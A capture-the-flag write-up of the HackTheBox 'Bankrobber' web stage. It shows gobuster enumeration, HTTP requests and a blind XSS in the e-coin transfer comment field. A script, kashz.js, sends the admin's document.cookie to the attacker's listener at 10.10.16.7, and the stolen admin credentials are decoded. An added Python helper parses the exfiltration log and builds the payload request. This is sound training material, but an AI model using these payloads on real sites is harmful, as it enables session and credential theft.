# 2 :80 :443 XSS > admin

```
http://bankrobber.htb/
e-coin website

$ gobuster dir -u http://bankrobber.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/img                  (Status: 301) [Size: 338] [--> http://bankrobber.htb/img/]
/register.php         (Status: 200) [Size: 0]
/login.php            (Status: 302) [Size: 0] [--> index.php]
/index.php            (Status: 200) [Size: 8245]
/user                 (Status: 301) [Size: 339] [--> http://bankrobber.htb/user/]
/admin                (Status: 301) [Size: 340] [--> http://bankrobber.htb/admin/]
/link.php             (Status: 200) [Size: 0]
/css                  (Status: 301) [Size: 338] [--> http://bankrobber.htb/css/]
/js                   (Status: 301) [Size: 337] [--> http://bankrobber.htb/js/]
/examples             (Status: 503) [Size: 1060]
/generic.html         (Status: 200) [Size: 13343]
/notes.txt            (Status: 200) [Size: 133]
/logout.php           (Status: 302) [Size: 0] [--> index.php?msg=Succesfully logged out]
/elements.html        (Status: 200) [Size: 34812]
/licenses             (Status: 403) [Size: 1205]
/fonts                (Status: 301) [Size: 340] [--> http://bankrobber.htb/fonts/]
/phpmyadmin           (Status: 403) [Size: 1205]
/webalizer            (Status: 403) [Size: 1046]

http://bankrobber.htb/admin/
You're not authorized to view this page

http://bankrobber.htb/generic.html
Similar website (old); links not working.

http://bankrobber.htb/notes.txt
- Move all files from the default Xampp folder: TODO
- Encode comments for every IP address except localhost: Done
- Take a break..

# login form is on index.php itself; it POSTs to /login.php
# default creds admin:admin: nothing happens

# register is also on index.php
# sends POST request
# response
http://bankrobber.htb/index.php?msg=User%20created.

# login as kashz:kashz
POST /login.php HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://bankrobber.htb
DNT: 1
Connection: close
Referer: http://bankrobber.htb/index.php?msg=User%20created.
Upgrade-Insecure-Requests: 1

username=kashz&password=kashz&pounds=Submit+Query

# fetches /user/
GET /user/ HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bankrobber.htb/index.php?msg=User%20created.
DNT: 1
Connection: close
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
Upgrade-Insecure-Requests: 1

# cookie is just base64: username=kashz, password=kashz (the plaintext creds are stored client-side and sent on every request)
# interesting js file is requested by /user/
GET /js/transfer.js HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://bankrobber.htb/user/
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
```

```
# transfer.js
//Start user functions
function transferEcoin(fromId,toId,amount,comment){
	var http = new XMLHttpRequest();
	var url = 'transfer.php';
	var params = 'fromId='+fromId+'&toId='+toId+'&amount='+amount+'&comment='+comment;
	http.open('POST', url, true);

	http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	http.send(params);
}

function getVal(id){
		return document.getElementById(id).value;
}

function getData(){
	fromId = getVal("fromId");
	toId = getVal("toId");
	amount = getVal("amount");
	comment = getVal("comment");
	transferEcoin(fromId,toId,amount,comment);
	alert('Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.');
}
// End user function
// Start admin functions
function handleTransaction(status,id,from,to,amount){
	var http = new XMLHttpRequest();
	var url = 'handle.php';
	var params = 'status='+status+'&id='+id+'&from='+from+'&to='+to+'&amount='+amount;
	http.open('POST', url, true);

	http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	http.send(params);
}
// End admin functions

# can't find handle.php anywhere reachable; it is the admin-side endpoint and /admin/ refuses us

$ gobuster dir -u http://bankrobber.htb/user -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/index.php            (Status: 200) [Size: 39]
/auth.php             (Status: 200) [Size: 39]
/transfer.php         (Status: 200) [Size: 39]

# nothing here
# no vhosts

# exploring transfer e-coin
POST /user/transfer.php HTTP/1.1
Host: bankrobber.htb
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://bankrobber.htb
Dnt: 1
Referer: https://bankrobber.htb/user/
Te: trailers
Connection: close

fromId=8&toId=2&amount=10&comment=test
# then comes a popup
Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.

# the admin reviews every transaction, so whatever we put in the comment field is probably rendered in the admin's browser: try for a callback (blind XSS)
# tried plain links first, nothing
```

### Trying XSS

```
<script src="http://10.10.16.7/"></script>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:23:58] "GET / HTTP/1.1" 200 -

# we do get a callback: the box (10.10.10.154) fetched our URL, so the comment is rendered unencoded on the admin side
# (matches notes.txt: comments are encoded for every IP except localhost, which is why we never see the XSS reflected to ourselves)
# tried payloads from PayloadAllTheThings/XSS - was getting nothing back
# simpler way: make the admin's browser load a .js file from us and run it
#   (the script executes in the admin's browser, not on the server)

# requesting the .js file; payload goes in the comment field
<script src='http://10.10.16.7/kashz.js'></script>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:30:38] code 404, message File not found
10.10.10.154 - - [30/Sep/2021 15:30:38] "GET /kashz.js HTTP/1.1" 404 -

# file: kashz.js
# the function has to be called at the end of the file, otherwise nothing fires
function cookie1() {
    // load an <img> from our listener with the admin's cookies in the query string
    var img = document.createElement("img");
    img.src = "http://10.10.16.7/cookie?=" + document.cookie;
    document.body.appendChild(img);
}
cookie1();

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:35:58] "GET /kashz.js HTTP/1.1" 200 -
10.10.10.154 - - [30/Sep/2021 15:35:59] "GET /cookie?=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -

# url-decode
GET /cookie?=username=YWRtaW4=; password=SG9wZWxlc3Nyb21hbnRpYw==; id=1 HTTP/1.1" 404
# base64 -d
admin:Hopelessromantic
```
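The two cookie decodes above (kashz's own cookie after login, and the admin's cookie pulled out of the `python3 -m http.server` log line) done in code, as an added example that is not part of the original writeup. It also builds the `/user/transfer.php` body with the comment URL-encoded, which the page's `transfer.js` does not do (it concatenates the fields raw, so a payload containing `&`, `+` or `#` would be mangled if sent through the site's own form). The sample cookie header and log line are copied from this page; the function names are mine.

```python
import base64
import re
from urllib.parse import unquote, urlencode

# Sample input (copied from the writeup): Cookie header set after logging in as kashz:kashz.
USER_COOKIE_HEADER = "id=8; username=a2FzaHo%3D; password=a2FzaHo%3D"

# Sample input (copied from the writeup): request line logged by http.server when the
# admin's browser loaded the <img> planted by kashz.js.
EXFIL_LOG_LINE = (
    '10.10.10.154 - - [30/Sep/2021 15:35:59] '
    '"GET /cookie?=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -'
)


def decode_cookie_header(header):
    """Parse 'k=v; k2=v2' (possibly URL-encoded) and base64-decode username/password.

    The site keeps the credentials client-side as URL-encoded base64, so a decoded
    cookie is literally the plaintext login. Returns a dict of cookie name -> value.
    """
    # unquote first: a cookie string exfiltrated via an img src arrives with %3D / %20
    header = unquote(header)
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" not in part:
            continue
        name, _, value = part.partition("=")
        if name in ("username", "password"):
            value = base64.b64decode(value).decode()
        cookies[name] = value
    return cookies


def extract_cookie_from_log(line):
    """Pull the exfiltrated cookie string back out of an http.server request-line entry.

    Matches the '/cookie?=<document.cookie>' path used by kashz.js above.
    """
    match = re.search(r'"GET /cookie\?=(.*?) HTTP/', line)
    if not match:
        raise ValueError("no exfil request in log line")
    return match.group(1)


def creds_from_cookie(cookies):
    """Return 'username:password' as the writeup shows it after base64 -d."""
    return cookies["username"] + ":" + cookies["password"]


def build_transfer_body(from_id, to_id, amount, comment):
    """Form body for POST /user/transfer.php with every field URL-encoded.

    transfer.js builds this string by plain concatenation; urlencode() makes sure
    characters like & + # inside the XSS payload survive as part of the comment.
    """
    return urlencode({"fromId": from_id, "toId": to_id, "amount": amount, "comment": comment})


if __name__ == "__main__":
    print(decode_cookie_header(USER_COOKIE_HEADER))
    admin = decode_cookie_header(extract_cookie_from_log(EXFIL_LOG_LINE))
    print(creds_from_cookie(admin))
    print(build_transfer_body(8, 2, 10, "<script src='http://10.10.16.7/kashz.js'></script>"))
```

Run it against a real listener log by feeding each line of the `http.server` output to `extract_cookie_from_log`; lines without the `/cookie?=` path raise and can be skipped.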

